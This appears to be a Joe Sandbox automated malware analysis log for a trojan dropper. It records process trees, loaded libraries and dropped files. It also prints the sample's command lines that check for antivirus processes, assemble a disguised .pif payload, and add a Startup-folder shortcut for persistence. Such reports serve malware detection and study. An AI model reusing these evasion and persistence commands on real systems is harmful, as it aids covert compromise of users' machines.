      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D6A7423_2_009D6A74
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009B0BE023_2_009B0BE0
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009FEDB223_2_009FEDB2
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CCD5123_2_009CCD51
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A20EB723_2_00A20EB7
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A08E4423_2_00A08E44
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D6FE623_2_009D6FE6
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009AB02023_2_009AB020
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C33B723_2_009C33B7
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009A94E023_2_009A94E0
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CF40923_2_009CF409
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009BD45D23_2_009BD45D
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C16B423_2_009C16B4
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009AF6A023_2_009AF6A0
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009BF62823_2_009BF628
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009A166323_2_009A1663
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C78C323_2_009C78C3
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C1BA823_2_009C1BA8
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CDBA523_2_009CDBA5
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009A9C8023_2_009A9C80
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D9CE523_2_009D9CE5
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009BDD2823_2_009BDD28
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009CBFD623_2_009CBFD6
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C1FC023_2_009C1FC0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: String function: 00908B30 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: String function: 008F1A36 appears 34 times
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: String function: 00900D17 appears 70 times
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: String function: 009C0D17 appears 70 times
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: String function: 009B1A36 appears 34 times
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: String function: 009C8B30 appears 42 times
      Source: sV9ElC4fU4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@32/12@2/5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094A6AD GetLastError,FormatMessageW,22_2_0094A6AD
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00938DE9 AdjustTokenPrivileges,CloseHandle,22_2_00938DE9
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_00939399
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009F8DE9 AdjustTokenPrivileges,CloseHandle,23_2_009F8DE9
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_009F9399
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,22_2_0094B976
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00944148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,22_2_00944148
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094C9DA CoInitialize,CoCreateInstance,CoUninitialize,22_2_0094C9DA
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0094443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,22_2_0094443D
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifFile created: C:\Users\user\AppData\Local\DesignQuantum InnovationsJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeFile created: C:\Users\user\AppData\Local\Temp\nsj51E3.tmpJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat
      Source: sV9ElC4fU4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: sV9ElC4fU4.exeReversingLabs: Detection: 44%
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeFile read: C:\Users\user\Desktop\sV9ElC4fU4.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\sV9ElC4fU4.exe "C:\Users\user\Desktop\sV9ElC4fU4.exe"
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353685
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WirelessNeilAspBringing" Actively
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Skirts D
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif Soldiers.pif D
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & exit
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" "C:\Users\user\AppData\Local\DesignQuantum Innovations\q"
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr"
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353685Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WirelessNeilAspBringing" Actively Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Skirts DJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif Soldiers.pif DJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url" & exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifProcess created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" "C:\Users\user\AppData\Local\DesignQuantum Innovations\q"Jump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrProcess created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr "C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr" Jump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: sV9ElC4fU4.exeStatic file information: File size 7662434 > 1048576
      Source: sV9ElC4fU4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406312
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00908B75 push ecx; ret 22_2_00908B88
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C8B75 push ecx; ret 23_2_009C8B88

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifFile created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifFile created: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.urlJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.urlJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_009659B3
